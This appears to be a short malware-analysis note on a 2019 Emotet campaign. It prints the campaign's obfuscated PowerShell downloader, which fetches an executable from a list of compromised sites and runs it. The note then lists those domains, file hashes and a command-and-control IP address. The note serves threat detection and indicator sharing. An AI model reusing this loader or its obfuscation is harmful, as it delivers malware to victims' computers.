2019-04-24 Emotet

1. 2019-04-24 Emotet
2. =================
3. PoSH Code
4. ---------
5. $pXGAA1D=("{1}{0}{2}"-f'ZwA','dBA','B1');
6. $qAAQx1A = '397';
7. $ABUUZA=("{0}{1}" -f 'k',("{1}{0}" -f("{0}{1}" -f'GU','wA'),'G'));
8. $zAGAXAQA=$env:userprofile+'\'+$qAAQx1A+("{0}{1}"-f'.e','xe');
9. $Q4U_BGA=("{2}{0}{1}" -f 'AAA','cA','X');
10. $ccA4UDB=&('new-ob'+'jec'+'t') net.`WEbCliE`NT;
11. $YZB4kQ=("{16}{43}{48}{29}{7}{33}{47}{44}{19}{2}{22}{34}{15}{46}{23}{12}{8}{14}{26}{9}{40}{4}{17}{41}{37}{32}{24}{30}{1}{39}{11}{21}{28}{38}{27}{45}{0}{10}{5}{18}{42}{20}{13}{31}{25}{6}{3}{35}{36}"-f("{0}{1}" -f'pi','nfo'),("{0}{1}" -f 'ng','.n'),("{1}{0}{2}" -f'ad','-',("{1}{0}"-f'/','min')),("{0}{2}{1}"-f 'com',("{1}{0}" -f 'e/','her'),'/t'),'s',("{1}{2}{0}" -f("{1}{0}" -f 'com','a.'),'mat','ic'),'s.','gyn',("{1}{0}{2}"-f 'tp','pha','h'),("{0}{1}{2}" -f("{1}{2}{0}"-f'cl','/wp-','in'),'u','d'),'r',("{2}{0}{1}" -f("{1}{0}"-f '201','_'),'8',("{1}{0}"-f'nu','me')),("{1}{2}{0}" -f 'ez.','ad','s'),'k/@','a','@ht','htt','/V','/','wp',("{1}{0}" -f 'yj',("{0}{1}" -f 'd/J','o')),'/v1','P5p','/',("{0}{1}"-f ':','//d'),("{1}{0}" -f 'g','udy'),("{0}{1}" -f'n',("{1}{0}"-f'com','.')),("{0}{1}"-f':',("{1}{0}"-f'ja','//')),'3X','o',("{3}{0}{1}{2}"-f 'en',("{0}{1}" -f'g','inee'),'ri','kw-'),("{2}{0}{1}" -f 'tp',("{0}{1}"-f ':/','/j'),'ht'),'p','-','e/','I',("{0}{1}"-f 'U','GE/'),("{0}{1}"-f '@h','tt'),("{1}{0}"-f 'p',("{1}{0}{2}" -f '/@h','L','tt')),'et/','e','zj/',("{0}{1}{2}" -f'bo','x',("{0}{1}" -f'cl','ou')),("{0}{1}"-f 'p:','//u'),("{2}{0}{1}{3}" -f ("{0}{1}"-f 'ops.','c'),'om','sh','/'),'s',("{0}{1}"-f't','p:/'),("{1}{0}" -f 'rk','wo'),'r')."SpL`it"('@');
12. $JACQcA=("{0}{1}" -f'C',("{0}{1}" -f 'A',("{1}{0}"-f'AA','Ao')));
13. foreach($q_AGcAUk in $YZB4kQ){try{$ccA4UDB."DownlOad`F`i`lE"($q_AGcAUk, $zAGAXAQA);
14. $fAGc1_AQ=("{1}{0}{2}"-f 'UQU','C',("{0}{1}" -f 'AAQ','D'));
15. If ((&('Get'+'-'+'Item') $zAGAXAQA)."leNG`TH" -ge 20694) {.('In'+'voke'+'-It'+'em') $zAGAXAQA;
16. $sADXDQA=("{0}{1}"-f("{0}{1}" -f ("{0}{1}"-f 'dA','44'),'1'),'U');
17. break;
18. $mAxXQ1XZ=("{0}{1}"-f 'j',("{0}{2}{1}"-f'A','U',("{1}{0}"-f'QA','kA')))}}catch{}}$RQAUDAck=("{1}{0}" -f 'BBA','IDx')
19.  
20. Domains used
21. ------------
22. http://urogyn-workshops.com/wp-admin/P5pe/
23. http://adsez.phatphan.com/wp-includes/Vzj/
24. http://dkw-engineering.net/menu_2018/v13XL/
25. http://jaspinformatica.com/boxcloud/Joyjk/
26. http://judygs.com/there/IUGE/
27.  
28. Hashes for attachment
29. ---------------------
30. 0f84045b81e1f16e00f0dd56201468e8 --> https://www.virustotal.com/#/file/6c3477e17063e89277bd134d2b27e7b14d8e089246509e4dea1d400aa68d476e/detection
31. aecd38da598664b6feb6e23d369d64ab
32. e96332924a6d5bde280444a212f4ebf7 --> https://www.virustotal.com/#/file/2ffb8c50230d55ae57d96801312556d38eaf143052c0942f97b022588c45c722/detection
33.  
34. Hash for promptrelated.exe
35. ---------------------------
36. 24c6fc3d5299e9a4cfba1cf5c5f88719 --> https://www.virustotal.com/#/file/323154c4cb75b02983bc4e076be06997644eb8852384aa8d92b48131bc085f00/detection
37.  
38. C2:
39. ---
40. 185.94.252.27:443